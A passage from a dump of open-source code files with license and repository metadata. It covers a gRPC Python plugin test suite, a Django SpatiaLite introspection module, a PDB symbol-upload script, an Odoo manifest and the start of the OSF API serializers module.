import tests.protoc_plugin.protos.requests.r.test_requests_pb2 as request_pb2
import tests.protoc_plugin.protos.responses.test_responses_pb2 as response_pb2
import tests.protoc_plugin.protos.service.test_service_pb2_grpc as service_pb2_grpc
# Identifiers of entities we expect to find in the generated module.
STUB_IDENTIFIER = 'TestServiceStub'
SERVICER_IDENTIFIER = 'TestServiceServicer'
ADD_SERVICER_TO_SERVER_IDENTIFIER = 'add_TestServiceServicer_to_server'
class _ServicerMethods(object):
def __init__(self):
self._condition = threading.Condition()
self._paused = False
self._fail = False
@contextlib.contextmanager
def pause(self): # pylint: disable=invalid-name
with self._condition:
self._paused = True
yield
with self._condition:
self._paused = False
self._condition.notify_all()
@contextlib.contextmanager
def fail(self): # pylint: disable=invalid-name
with self._condition:
self._fail = True
yield
with self._condition:
self._fail = False
def _control(self): # pylint: disable=invalid-name
with self._condition:
if self._fail:
raise ValueError()
while self._paused:
self._condition.wait()
def UnaryCall(self, request, unused_rpc_context):
response = response_pb2.SimpleResponse()
response.payload.payload_type = payload_pb2.COMPRESSABLE
response.payload.payload_compressable = 'a' * request.response_size
self._control()
return response
def StreamingOutputCall(self, request, unused_rpc_context):
for parameter in request.response_parameters:
response = response_pb2.StreamingOutputCallResponse()
response.payload.payload_type = payload_pb2.COMPRESSABLE
response.payload.payload_compressable = 'a' * parameter.size
self._control()
yield response
def StreamingInputCall(self, request_iter, unused_rpc_context):
response = response_pb2.StreamingInputCallResponse()
aggregated_payload_size = 0
for request in request_iter:
aggregated_payload_size += len(request.payload.payload_compressable)
response.aggregated_payload_size = aggregated_payload_size
self._control()
return response
def FullDuplexCall(self, request_iter, unused_rpc_context):
for request in request_iter:
for parameter in request.response_parameters:
response = response_pb2.StreamingOutputCallResponse()
response.payload.payload_type = payload_pb2.COMPRESSABLE
response.payload.payload_compressable = 'a' * parameter.size
self._control()
yield response
def HalfDuplexCall(self, request_iter, unused_rpc_context):
responses = []
for request in request_iter:
for parameter in request.response_parameters:
response = response_pb2.StreamingOutputCallResponse()
response.payload.payload_type = payload_pb2.COMPRESSABLE
response.payload.payload_compressable = 'a' * parameter.size
self._control()
responses.append(response)
for response in responses:
yield response
class _Service(
collections.namedtuple('_Service', (
'servicer_methods',
'server',
'stub',
))):
"""A live and running service.
Attributes:
servicer_methods: The _ServicerMethods servicing RPCs.
server: The grpc.Server servicing RPCs.
stub: A stub on which to invoke RPCs.
"""
def _CreateService():
"""Provides a servicer backend and a stub.
Returns:
A _Service with which to test RPCs.
"""
servicer_methods = _ServicerMethods()
class Servicer(getattr(service_pb2_grpc, SERVICER_IDENTIFIER)):
def UnaryCall(self, request, context):
return servicer_methods.UnaryCall(request, context)
def StreamingOutputCall(self, request, context):
return servicer_methods.StreamingOutputCall(request, context)
def StreamingInputCall(self, request_iter, context):
return servicer_methods.StreamingInputCall(request_iter, context)
def FullDuplexCall(self, request_iter, context):
return servicer_methods.FullDuplexCall(request_iter, context)
def HalfDuplexCall(self, request_iter, context):
return servicer_methods.HalfDuplexCall(request_iter, context)
server = test_common.test_server()
getattr(service_pb2_grpc, ADD_SERVICER_TO_SERVER_IDENTIFIER)(Servicer(),
server)
port = server.add_insecure_port('[::]:0')
server.start()
channel = grpc.insecure_channel('localhost:{}'.format(port))
stub = getattr(service_pb2_grpc, STUB_IDENTIFIER)(channel)
return _Service(servicer_methods, server, stub)
def _CreateIncompleteService():
"""Provides a servicer backend that fails to implement methods and its stub.
Returns:
A _Service with which to test RPCs. The returned _Service's
servicer_methods implements none of the methods required of it.
"""
class Servicer(getattr(service_pb2_grpc, SERVICER_IDENTIFIER)):
pass
server = test_common.test_server()
getattr(service_pb2_grpc, ADD_SERVICER_TO_SERVER_IDENTIFIER)(Servicer(),
server)
port = server.add_insecure_port('[::]:0')
server.start()
channel = grpc.insecure_channel('localhost:{}'.format(port))
stub = getattr(service_pb2_grpc, STUB_IDENTIFIER)(channel)
return _Service(None, server, stub)
def _streaming_input_request_iterator():
for _ in range(3):
request = request_pb2.StreamingInputCallRequest()
request.payload.payload_type = payload_pb2.COMPRESSABLE
request.payload.payload_compressable = 'a'
yield request
def _streaming_output_request():
request = request_pb2.StreamingOutputCallRequest()
sizes = [1, 2, 3]
request.response_parameters.add(size=sizes[0], interval_us=0)
request.response_parameters.add(size=sizes[1], interval_us=0)
request.response_parameters.add(size=sizes[2], interval_us=0)
return request
def _full_duplex_request_iterator():
request = request_pb2.StreamingOutputCallRequest()
request.response_parameters.add(size=1, interval_us=0)
yield request
request = request_pb2.StreamingOutputCallRequest()
request.response_parameters.add(size=2, interval_us=0)
request.response_parameters.add(size=3, interval_us=0)
yield request
class PythonPluginTest(unittest.TestCase):
"""Test case for the gRPC Python protoc-plugin.
While reading these tests, remember that the futures API
(`stub.method.future()`) only gives futures for the *response-unary*
methods and does not exist for response-streaming methods.
"""
def testImportAttributes(self):
# check that we can access the generated module and its members.
self.assertIsNotNone(getattr(service_pb2_grpc, STUB_IDENTIFIER, None))
self.assertIsNotNone(
getattr(service_pb2_grpc, SERVICER_IDENTIFIER, None))
self.assertIsNotNone(
getattr(service_pb2_grpc, ADD_SERVICER_TO_SERVER_IDENTIFIER, None))
def testUpDown(self):
service = _CreateService()
self.assertIsNotNone(service.servicer_methods)
self.assertIsNotNone(service.server)
self.assertIsNotNone(service.stub)
service.server.stop(None)
def testIncompleteServicer(self):
service = _CreateIncompleteService()
request = request_pb2.SimpleRequest(response_size=13)
with self.assertRaises(grpc.RpcError) as exception_context:
service.stub.UnaryCall(request)
self.assertIs(exception_context.exception.code(),
grpc.StatusCode.UNIMPLEMENTED)
service.server.stop(None)
def testUnaryCall(self):
service = _CreateService()
request = request_pb2.SimpleRequest(response_size=13)
response = service.stub.UnaryCall(request)
expected_response = service.servicer_methods.UnaryCall(
request, 'not a real context!')
self.assertEqual(expected_response, response)
service.server.stop(None)
def testUnaryCallFuture(self):
service = _CreateService()
request = request_pb2.SimpleRequest(response_size=13)
# Check that the call does not block waiting for the server to respond.
with service.servicer_methods.pause():
response_future = service.stub.UnaryCall.future(request)
response = response_future.result()
expected_response = service.servicer_methods.UnaryCall(
request, 'not a real RpcContext!')
self.assertEqual(expected_response, response)
service.server.stop(None)
def testUnaryCallFutureExpired(self):
service = _CreateService()
request = request_pb2.SimpleRequest(response_size=13)
with service.servicer_methods.pause():
response_future = service.stub.UnaryCall.future(
request, timeout=test_constants.SHORT_TIMEOUT)
with self.assertRaises(grpc.RpcError) as exception_context:
response_future.result()
self.assertIs(exception_context.exception.code(),
grpc.StatusCode.DEADLINE_EXCEEDED)
self.assertIs(response_future.code(), grpc.StatusCode.DEADLINE_EXCEEDED)
service.server.stop(None)
def testUnaryCallFutureCancelled(self):
service = _CreateService()
request = request_pb2.SimpleRequest(response_size=13)
with service.servicer_methods.pause():
response_future = service.stub.UnaryCall.future(request)
response_future.cancel()
self.assertTrue(response_future.cancelled())
self.assertIs(response_future.code(), grpc.StatusCode.CANCELLED)
service.server.stop(None)
def testUnaryCallFutureFailed(self):
service = _CreateService()
request = request_pb2.SimpleRequest(response_size=13)
with service.servicer_methods.fail():
response_future = service.stub.UnaryCall.future(request)
self.assertIsNotNone(response_future.exception())
self.assertIs(response_future.code(), grpc.StatusCode.UNKNOWN)
service.server.stop(None)
def testStreamingOutputCall(self):
service = _CreateService()
request = _streaming_output_request()
responses = service.stub.StreamingOutputCall(request)
expected_responses = service.servicer_methods.StreamingOutputCall(
request, 'not a real RpcContext!')
for expected_response, response in moves.zip_longest(
expected_responses, responses):
self.assertEqual(expected_response, response)
service.server.stop(None)
def testStreamingOutputCallExpired(self):
service = _CreateService()
request = _streaming_output_request()
with service.servicer_methods.pause():
responses = service.stub.StreamingOutputCall(
request, timeout=test_constants.SHORT_TIMEOUT)
with self.assertRaises(grpc.RpcError) as exception_context:
list(responses)
self.assertIs(exception_context.exception.code(),
grpc.StatusCode.DEADLINE_EXCEEDED)
service.server.stop(None)
def testStreamingOutputCallCancelled(self):
service = _CreateService()
request = _streaming_output_request()
responses = service.stub.StreamingOutputCall(request)
next(responses)
responses.cancel()
with self.assertRaises(grpc.RpcError) as exception_context:
next(responses)
self.assertIs(responses.code(), grpc.StatusCode.CANCELLED)
service.server.stop(None)
def testStreamingOutputCallFailed(self):
service = _CreateService()
request = _streaming_output_request()
with service.servicer_methods.fail():
responses = service.stub.StreamingOutputCall(request)
self.assertIsNotNone(responses)
with self.assertRaises(grpc.RpcError) as exception_context:
next(responses)
self.assertIs(exception_context.exception.code(),
grpc.StatusCode.UNKNOWN)
service.server.stop(None)
def testStreamingInputCall(self):
service = _CreateService()
response = service.stub.StreamingInputCall(
_streaming_input_request_iterator())
expected_response = service.servicer_methods.StreamingInputCall(
_streaming_input_request_iterator(), 'not a real RpcContext!')
self.assertEqual(expected_response, response)
service.server.stop(None)
def testStreamingInputCallFuture(self):
service = _CreateService()
with service.servicer_methods.pause():
response_future = service.stub.StreamingInputCall.future(
_streaming_input_request_iterator())
response = response_future.result()
expected_response = service.servicer_methods.StreamingInputCall(
_streaming_input_request_iterator(), 'not a real RpcContext!')
self.assertEqual(expected_response, response)
service.server.stop(None)
def testStreamingInputCallFutureExpired(self):
service = _CreateService()
with service.servicer_methods.pause():
response_future = service.stub.StreamingInputCall.future(
_streaming_input_request_iterator(),
timeout=test_constants.SHORT_TIMEOUT)
with self.assertRaises(grpc.RpcError) as exception_context:
response_future.result()
self.assertIsInstance(response_future.exception(), grpc.RpcError)
self.assertIs(response_future.exception().code(),
grpc.StatusCode.DEADLINE_EXCEEDED)
self.assertIs(exception_context.exception.code(),
grpc.StatusCode.DEADLINE_EXCEEDED)
service.server.stop(None)
def testStreamingInputCallFutureCancelled(self):
service = _CreateService()
with service.servicer_methods.pause():
response_future = service.stub.StreamingInputCall.future(
_streaming_input_request_iterator())
response_future.cancel()
self.assertTrue(response_future.cancelled())
with self.assertRaises(grpc.FutureCancelledError):
response_future.result()
service.server.stop(None)
def testStreamingInputCallFutureFailed(self):
service = _CreateService()
with service.servicer_methods.fail():
response_future = service.stub.StreamingInputCall.future(
_streaming_input_request_iterator())
self.assertIsNotNone(response_future.exception())
self.assertIs(response_future.code(), grpc.StatusCode.UNKNOWN)
service.server.stop(None)
def testFullDuplexCall(self):
service = _CreateService()
responses = service.stub.FullDuplexCall(_full_duplex_request_iterator())
expected_responses = service.servicer_methods.FullDuplexCall(
_full_duplex_request_iterator(), 'not a real RpcContext!')
for expected_response, response in moves.zip_longest(
expected_responses, responses):
self.assertEqual(expected_response, response)
service.server.stop(None)
def testFullDuplexCallExpired(self):
request_iterator = _full_duplex_request_iterator()
service = _CreateService()
with service.servicer_methods.pause():
responses = service.stub.FullDuplexCall(
request_iterator, timeout=test_constants.SHORT_TIMEOUT)
with self.assertRaises(grpc.RpcError) as exception_context:
list(responses)
self.assertIs(exception_context.exception.code(),
grpc.StatusCode.DEADLINE_EXCEEDED)
service.server.stop(None)
def testFullDuplexCallCancelled(self):
service = _CreateService()
request_iterator = _full_duplex_request_iterator()
responses = service.stub.FullDuplexCall(request_iterator)
next(responses)
responses.cancel()
with self.assertRaises(grpc.RpcError) as exception_context:
next(responses)
self.assertIs(exception_context.exception.code(),
grpc.StatusCode.CANCELLED)
service.server.stop(None)
def testFullDuplexCallFailed(self):
request_iterator = _full_duplex_request_iterator()
service = _CreateService()
with service.servicer_methods.fail():
responses = service.stub.FullDuplexCall(request_iterator)
with self.assertRaises(grpc.RpcError) as exception_context:
next(responses)
self.assertIs(exception_context.exception.code(),
grpc.StatusCode.UNKNOWN)
service.server.stop(None)
def testHalfDuplexCall(self):
service = _CreateService()
def half_duplex_request_iterator():
request = request_pb2.StreamingOutputCallRequest()
request.response_parameters.add(size=1, interval_us=0)
yield request
request = request_pb2.StreamingOutputCallRequest()
request.response_parameters.add(size=2, interval_us=0)
request.response_parameters.add(size=3, interval_us=0)
yield request
responses = service.stub.HalfDuplexCall(half_duplex_request_iterator())
expected_responses = service.servicer_methods.HalfDuplexCall(
half_duplex_request_iterator(), 'not a real RpcContext!')
for expected_response, response in moves.zip_longest(
expected_responses, responses):
self.assertEqual(expected_response, response)
service.server.stop(None)
def testHalfDuplexCallWedged(self):
condition = threading.Condition()
wait_cell = [False]
@contextlib.contextmanager
def wait(): # pylint: disable=invalid-name
# Where's Python 3's 'nonlocal' statement when you need it?
with condition:
wait_cell[0] = True
yield
with condition:
wait_cell[0] = False
condition.notify_all()
def half_duplex_request_iterator():
request = request_pb2.StreamingOutputCallRequest()
request.response_parameters.add(size=1, interval_us=0)
yield request
with condition:
while wait_cell[0]:
condition.wait()
service = _CreateService()
with wait():
responses = service.stub.HalfDuplexCall(
half_duplex_request_iterator(),
timeout=test_constants.SHORT_TIMEOUT)
# half-duplex waits for the client to send all info
with self.assertRaises(grpc.RpcError) as exception_context:
next(responses)
self.assertIs(exception_context.exception.code(),
grpc.StatusCode.DEADLINE_EXCEEDED)
service.server.stop(None)
if __name__ == '__main__':
unittest.main(verbosity=2)
| apache-2.0 |
sidmitra/django_nonrel_testapp | django/contrib/gis/db/backends/spatialite/introspection.py | 401 | 2112 | from django.contrib.gis.gdal import OGRGeomType
from django.db.backends.sqlite3.introspection import DatabaseIntrospection, FlexibleFieldLookupDict
class GeoFlexibleFieldLookupDict(FlexibleFieldLookupDict):
"""
Sublcass that includes updates the `base_data_types_reverse` dict
for geometry field types.
"""
base_data_types_reverse = FlexibleFieldLookupDict.base_data_types_reverse.copy()
base_data_types_reverse.update(
{'point' : 'GeometryField',
'linestring' : 'GeometryField',
'polygon' : 'GeometryField',
'multipoint' : 'GeometryField',
'multilinestring' : 'GeometryField',
'multipolygon' : 'GeometryField',
'geometrycollection' : 'GeometryField',
})
class SpatiaLiteIntrospection(DatabaseIntrospection):
data_types_reverse = GeoFlexibleFieldLookupDict()
def get_geometry_type(self, table_name, geo_col):
cursor = self.connection.cursor()
try:
# Querying the `geometry_columns` table to get additional metadata.
cursor.execute('SELECT "coord_dimension", "srid", "type" '
'FROM "geometry_columns" '
'WHERE "f_table_name"=%s AND "f_geometry_column"=%s',
(table_name, geo_col))
row = cursor.fetchone()
if not row:
raise Exception('Could not find a geometry column for "%s"."%s"' %
(table_name, geo_col))
# OGRGeomType does not require GDAL and makes it easy to convert
# from OGC geom type name to Django field.
field_type = OGRGeomType(row[2]).django
# Getting any GeometryField keyword arguments that are not the default.
dim = row[0]
srid = row[1]
field_params = {}
if srid != 4326:
field_params['srid'] = srid
if isinstance(dim, basestring) and 'Z' in dim:
field_params['dim'] = 3
finally:
cursor.close()
return field_type, field_params
| bsd-3-clause |
brave/muon | script/upload-windows-pdb.py | 2 | 1160 | #!/usr/bin/env python
import os
import glob
import sys
from lib.config import s3_config
from lib.util import electron_gyp, execute, rm_rf, safe_mkdir, s3put
SOURCE_ROOT = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
SYMBOLS_DIR = 'dist\\symbols'
DOWNLOAD_DIR = 'vendor\\brightray\\vendor\\download\\libchromiumcontent'
PROJECT_NAME = electron_gyp()['project_name%']
PRODUCT_NAME = electron_gyp()['product_name%']
PDB_LIST = [
'out\\R\\{0}.exe.pdb'.format(PROJECT_NAME),
]
def main():
os.chdir(SOURCE_ROOT)
rm_rf(SYMBOLS_DIR)
safe_mkdir(SYMBOLS_DIR)
for pdb in PDB_LIST:
run_symstore(pdb, SYMBOLS_DIR, PRODUCT_NAME)
bucket, access_key, secret_key = s3_config()
files = glob.glob(SYMBOLS_DIR + '/*.pdb/*/*.pdb')
files = [f.lower() for f in files]
upload_symbols(bucket, access_key, secret_key, files)
def run_symstore(pdb, dest, product):
execute(['symstore', 'add', '/r', '/f', pdb, '/s', dest, '/t', product])
def upload_symbols(bucket, access_key, secret_key, files):
s3put(bucket, access_key, secret_key, SYMBOLS_DIR, 'atom-shell/symbols',
files)
if __name__ == '__main__':
sys.exit(main())
| mit |
damdam-s/bank-statement-reconcile | __unported__/account_advanced_reconcile_transaction_ref/__openerp__.py | 14 | 1575 | # -*- coding: utf-8 -*-
##############################################################################
#
# Author: Romain Deheele. Copyright Camptocamp SA
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{'name': 'Advanced Reconcile Transaction Ref',
'description': """
Advanced reconciliation method for the module account_advanced_reconcile
========================================================================
Reconcile rules with transaction_ref
""",
'version': '1.0.1',
'author': "Camptocamp,Odoo Community Association (OCA)",
'category': 'Finance',
'website': 'http://www.camptocamp.com',
'license': 'AGPL-3',
'depends': ['account_advanced_reconcile'],
'data': ['easy_reconcile_view.xml'],
'demo': [],
'test': [], # To be ported or migrate to unit tests or scenarios
'auto_install': False,
'installable': False,
'images': []
}
| agpl-3.0 |
mfraezz/osf.io | api/base/serializers.py | 2 | 70134 | import collections
import re
from future.moves.urllib.parse import urlparse
import furl
from django.core.urlresolvers import resolve, reverse, NoReverseMatch
from django.core.exceptions import ImproperlyConfigured
from distutils.version import StrictVersion
from rest_framework import exceptions, permissions
from rest_framework import serializers as ser
from rest_framework.fields import SkipField
from rest_framework.fields import get_attribute as get_nested_attributes
from rest_framework.mixins import RetrieveModelMixin
from api.base import utils
from osf.utils import permissions as osf_permissions
from osf.utils import sanitize
from osf.utils import functional
from api.base import exceptions as api_exceptions
from api.base.settings import BULK_SETTINGS
from framework.auth import core as auth_core
from osf.models import AbstractNode, MaintenanceState, Preprint
from website import settings
from website.project.model import has_anonymous_link
from api.base.versioning import KEBAB_CASE_VERSION, get_kebab_snake_case_field
def get_meta_type(serializer_class, request):
meta = getattr(serializer_class, 'Meta', None)
if meta is None:
return None
resource_type = getattr(meta, 'type_', None)
if resource_type is not None:
return resource_type
try:
return meta.get_type(request)
except AttributeError:
return None
def format_relationship_links(related_link=None, self_link=None, rel_meta=None, self_meta=None):
"""
Properly handles formatting of self and related links according to JSON API.
Removes related or self link, if none.
"""
ret = {'links': {}}
if related_link:
ret['links'].update({
'related': {
'href': related_link or {},
'meta': rel_meta or {},
},
})
if self_link:
ret['links'].update({
'self': {
'href': self_link or {},
'meta': self_meta or {},
},
})
return ret
def is_anonymized(request):
if hasattr(request, '_is_anonymized'):
return request._is_anonymized
private_key = request.query_params.get('view_only', None)
request._is_anonymized = osf_permissions.check_private_key_for_anonymized_link(private_key)
return request._is_anonymized
class ConditionalField(ser.Field):
"""
Skips the inner field based on `should_show` or `should_hide`; override whichever makes the logic more readable.
If you'd prefer to return `None` rather skipping the field, override `should_be_none` as well.
"""
def __init__(self, field, **kwargs):
super(ConditionalField, self).__init__(**kwargs)
self.field = getattr(field, 'child_relation', field)
# source is intentionally field.source and not self.field.source
self.source = field.source
self.required = self.field.required
self.read_only = self.field.read_only
def should_show(self, instance):
return not self.should_hide(instance)
def should_hide(self, instance):
raise NotImplementedError()
def should_be_none(self, instance):
return False
def get_attribute(self, instance):
if not self.should_show(instance):
if self.should_be_none(instance):
return None
raise SkipField
return self.field.get_attribute(instance)
def bind(self, field_name, parent):
super(ConditionalField, self).bind(field_name, parent)
self.field.bind(field_name, self)
def to_representation(self, value):
if getattr(self.field.root, 'child', None):
self.field.parent = self.field.root.child
else:
self.field.parent = self.field.root
return self.field.to_representation(value)
def to_esi_representation(self, value, envelope='data'):
if getattr(self.field.root, 'child', None):
self.field.parent = self.field.root.child
else:
self.field.parent = self.field.root
return self.field.to_esi_representation(value, envelope)
def to_internal_value(self, data):
return self.field.to_internal_value(data)
class ShowIfVersion(ConditionalField):
"""
Skips the field if the specified request version is not after a feature's earliest supported version,
or not before the feature's latest supported version.
"""
def __init__(self, field, min_version=None, max_version=None, **kwargs):
super(ShowIfVersion, self).__init__(field, **kwargs)
self.min_version = min_version
self.max_version = max_version
self.help_text = 'This field is deprecated as of version {}'.format(self.max_version) or kwargs.get('help_text')
def should_hide(self, instance):
request = self.context.get('request')
return request and utils.is_deprecated(request.version, self.min_version, self.max_version)
class ShowIfCurrentUser(ConditionalField):
def should_show(self, instance):
request = self.context.get('request')
return request and request.user == instance
class ShowIfAdminScopeOrAnonymous(ConditionalField):
def should_show(self, instance):
request = self.context.get('request')
has_admin_scope = instance.has_admin_scope if hasattr(instance, 'has_admin_scope') else utils.has_admin_scope(request)
return request and (request.user.is_anonymous or has_admin_scope)
class HideIfRegistration(ConditionalField):
"""
If node is a registration, this field will return None.
"""
def should_hide(self, instance):
return instance.is_registration
def should_be_none(self, instance):
return not isinstance(self.field, RelationshipField)
class HideIfDisabled(ConditionalField):
"""
If the user is disabled, returns None for attribute fields, or skips
if a RelationshipField.
"""
def should_hide(self, instance):
return instance.is_disabled
def should_be_none(self, instance):
return not isinstance(self.field, RelationshipField)
class HideIfPreprint(ConditionalField):
"""
If object is a preprint or related to a preprint, hide the field.
"""
def should_hide(self, instance):
if getattr(instance, 'node', False) and isinstance(getattr(instance, 'node', False), Preprint):
# Sometimes a "node" might be a preprint object where node/preprint code is shared
return True
return isinstance(instance, Preprint) \
or isinstance(getattr(instance, 'target', None), Preprint) \
or isinstance(getattr(instance, 'preprint', False), Preprint)
def should_be_none(self, instance):
return not isinstance(self.field, RelationshipField)
class NoneIfWithdrawal(ConditionalField):
"""
If preprint is withdrawn, this field (attribute or relationship) should return None instead of hidden.
"""
def should_hide(self, instance):
return instance.is_retracted
def should_be_none(self, instance):
return True
class HideIfWithdrawal(ConditionalField):
"""
If registration is withdrawn, this field will return None.
"""
def should_hide(self, instance):
return instance.is_retracted
def should_be_none(self, instance):
return not isinstance(self.field, RelationshipField)
class HideIfNotWithdrawal(ConditionalField):
def should_hide(self, instance):
return not instance.is_retracted
class HideIfWikiDisabled(ConditionalField):
"""
If wiki is disabled, don't show relationship field, only available after 2.7
"""
def should_hide(self, instance):
request = self.context.get('request')
has_wiki_addon = instance.has_wiki_addon if hasattr(instance, 'has_wiki_addon') else instance.has_addon('wiki')
return not utils.is_deprecated(request.version, min_version='2.8') and not has_wiki_addon
class HideIfNotNodePointerLog(ConditionalField):
"""
This field will not be shown if the log is not a pointer log for a node
"""
def should_hide(self, instance):
pointer_param = instance.params.get('pointer', False)
if pointer_param:
node = AbstractNode.load(pointer_param['id'])
if node:
return node.type != 'osf.node'
return True
class HideIfNotRegistrationPointerLog(ConditionalField):
"""
This field will not be shown if the log is not a pointer log for a registration
"""
def should_hide(self, instance):
pointer_param = instance.params.get('pointer', False)
if pointer_param:
node = AbstractNode.load(pointer_param['id'])
if node:
return node.type != 'osf.registration'
return True
class HideIfProviderCommentsAnonymous(ConditionalField):
"""
If the action's provider has anonymous comments and the user does not have `view_actions`
permission on the provider, hide the field.
"""
def should_hide(self, instance):
request = self.context.get('request')
auth = utils.get_user_auth(request)
if auth.logged_in:
provider = instance.target.provider
if provider.reviews_comments_anonymous is False or auth.user.has_perm('view_actions', provider):
return False
return True
class HideIfProviderCommentsPrivate(ConditionalField):
"""
If the action's provider has private comments and the user does not have `view_actions`
permission on the provider, hide the field.
"""
def should_hide(self, instance):
request = self.context.get('request')
auth = utils.get_user_auth(request)
if auth.logged_in:
provider = instance.target.provider
if provider.reviews_comments_private is False or auth.user.has_perm('view_actions', provider):
return False
return True
class AllowMissing(ser.Field):
def __init__(self, field, **kwargs):
super(AllowMissing, self).__init__(**kwargs)
self.field = field
def to_representation(self, value):
return self.field.to_representation(value)
def bind(self, field_name, parent):
super(AllowMissing, self).bind(field_name, parent)
self.field.bind(field_name, self)
def get_attribute(self, instance):
"""
Overwrite the error message to return a blank value is if there is no existing value.
This allows the display of keys that do not exist in the DB (gitHub on a new OSF account for example.)
"""
try:
return self.field.get_attribute(instance)
except SkipField:
return ''
def to_internal_value(self, data):
return self.field.to_internal_value(data)
def _url_val(val, obj, serializer, request, **kwargs):
"""Function applied by `HyperlinksField` to get the correct value in the
schema.
"""
url = None
if isinstance(val, Link): # If a Link is passed, get the url value
url = val.resolve_url(obj, request)
elif isinstance(val, str): # if a string is passed, it's a method of the serializer
if getattr(serializer, 'field', None):
serializer = serializer.parent
url = getattr(serializer, val)(obj) if obj is not None else None
else:
url = val
if not url and url != 0:
raise SkipField
else:
return url
class VersionedDateTimeField(ser.DateTimeField):
"""
Custom DateTimeField that forces dates into the ISO-8601 format with timezone information in version 2.2.
"""
def to_representation(self, value):
request = self.context.get('request')
if request:
if StrictVersion(request.version) >= '2.2':
self.format = '%Y-%m-%dT%H:%M:%S.%fZ'
else:
self.format = '%Y-%m-%dT%H:%M:%S.%f' if value.microsecond else '%Y-%m-%dT%H:%M:%S'
return super(VersionedDateTimeField, self).to_representation(value)
class IDField(ser.CharField):
"""
ID field that validates that 'id' in the request body is the same as the instance 'id' for single requests.
"""
def __init__(self, **kwargs):
kwargs['label'] = 'ID'
super(IDField, self).__init__(**kwargs)
# Overrides CharField
def to_internal_value(self, data):
request = self.context.get('request')
if request:
if request.method in utils.UPDATE_METHODS and not utils.is_bulk_request(request):
id_field = self.get_id(self.root.instance)
if id_field != data:
raise api_exceptions.Conflict(detail=('The id you used in the URL, "{}", does not match the id you used in the json body\'s id field, "{}". The object "{}" exists, otherwise you\'d get a 404, so most likely you need to change the id field to match.'.format(id_field, data, id_field)))
return super(IDField, self).to_internal_value(data)
def get_id(self, obj):
return getattr(obj, self.source, '_id')
class TypeField(ser.CharField):
"""
Type field that validates that 'type' in the request body is the same as the Meta type.
Also ensures that type is write-only and required.
"""
def __init__(self, **kwargs):
kwargs['write_only'] = True
kwargs['required'] = True
super(TypeField, self).__init__(**kwargs)
# Overrides CharField
def to_internal_value(self, data):
request = self.context.get('request', None)
if isinstance(self.root, JSONAPIListSerializer):
type_ = get_meta_type(self.root.child, request)
else:
type_ = get_meta_type(self.root, request)
kebab_case = str(type_).replace('-', '_')
if type_ != data and kebab_case == data:
type_ = kebab_case
self.context['request'].META.setdefault('warning', 'As of API Version {0}, all types are now Kebab-case. {0} will accept snake_case, but this will be deprecated in future versions.'.format(KEBAB_CASE_VERSION))
elif type_ != data:
raise api_exceptions.Conflict(detail=('This resource has a type of "{}", but you set the json body\'s type field to "{}". You probably need to change the type field to match the resource\'s type.'.format(type_, data)))
return super(TypeField, self).to_internal_value(data)
class TargetTypeField(ser.CharField):
"""
Enforces that the related resource has the correct type
"""
def __init__(self, **kwargs):
kwargs['write_only'] = True
kwargs['required'] = True
self.target_type = kwargs.pop('target_type')
super(TargetTypeField, self).__init__(**kwargs)
def to_internal_value(self, data):
if self.target_type != data:
raise api_exceptions.Conflict(detail=('The target resource has a type of "{}", but you set the json body\'s type field to "{}". You probably need to change the type field to match the target resource\'s type.'.format(self.target_type, data)))
return super(TargetTypeField, self).to_internal_value(data)
class JSONAPIListField(ser.ListField):
def to_internal_value(self, data):
if not isinstance(data, list):
self.fail('not_a_list', input_type=type(data).__name__)
return super(JSONAPIListField, self).to_internal_value(data)
class ValuesListField(JSONAPIListField):
"""
JSONAPIListField that uses a values_list with flat=True to return just
an array of the specified field (attr_name) for optimization purposes.
"""
def __init__(self, **kwargs):
self.attr_name = kwargs.pop('attr_name')
super(ValuesListField, self).__init__(**kwargs)
def to_representation(self, val):
return val.values_list(self.attr_name, flat=True)
class AuthorizedCharField(ser.CharField):
"""
Passes auth of the logged-in user to the object's method
defined as the field source.
Example:
content = AuthorizedCharField(source='get_content')
"""
def __init__(self, source, **kwargs):
self.source = source
super(AuthorizedCharField, self).__init__(source=self.source, **kwargs)
def get_attribute(self, obj):
user = self.context['request'].user
auth = auth_core.Auth(user)
field_source_method = getattr(obj, self.source)
return field_source_method(auth=auth)
class AnonymizedRegexField(AuthorizedCharField):
r"""
Performs a regex replace on the content of the authorized object's
source field when an anonymous view is requested.
Example:
content = AnonymizedRegexField(source='get_content', regex='\[@[^\]]*\]\([^\) ]*\)', replace='@A User')
"""
def __init__(self, source, regex, replace, **kwargs):
self.source = source
self.regex = regex
self.replace = replace
super(AnonymizedRegexField, self).__init__(source=self.source, **kwargs)
def get_attribute(self, obj):
value = super(AnonymizedRegexField, self).get_attribute(obj)
if value:
user = self.context['request'].user
auth = auth_core.Auth(user)
if 'view_only' in self.context['request'].query_params:
auth.private_key = self.context['request'].query_params['view_only']
if has_anonymous_link(obj.node, auth):
value = re.sub(self.regex, self.replace, value)
return value
class RelationshipField(ser.HyperlinkedIdentityField):
"""
RelationshipField that permits the return of both self and related links, along with optional
meta information. ::
children = RelationshipField(
related_view='nodes:node-children',
related_view_kwargs={'node_id': '<_id>'},
self_view='nodes:node-node-children-relationship',
self_view_kwargs={'node_id': '<_id>'},
related_meta={'count': 'get_node_count'}
)
The lookup field must be surrounded in angular brackets to find the attribute on the target. Otherwise, the lookup
field is assumed to be a method on the serializer. ::
root = RelationshipField(
related_view='nodes:node-detail',
related_view_kwargs={'node_id': '<root._id>'}
)
region = RegionRelationshipField(
related_view='regions:region-detail',
related_view_kwargs={'region_id': 'get_region_id'},
read_only=False
)
'root._id' is enclosed in angular brackets, but 'get_region_id' is not.
'root._id' will be looked up on the target, but 'get_region_id' will be executed on the serializer.
Field can handle a filter_key, which operates as the source field (but
is named differently to not interfere with HyperLinkedIdentifyField's source
The ``filter_key`` argument defines the Mongo key (or ODM field name) to filter on
when using the ``FilterMixin`` on a view. ::
parent = RelationshipField(
related_view='nodes:node-detail',
related_view_kwargs={'node_id': '<parent_node._id>'},
filter_key='parent_node'
)
Field can include optional filters:
Example:
replies = RelationshipField(
self_view='nodes:node-comments',
self_view_kwargs={'node_id': '<node._id>'},
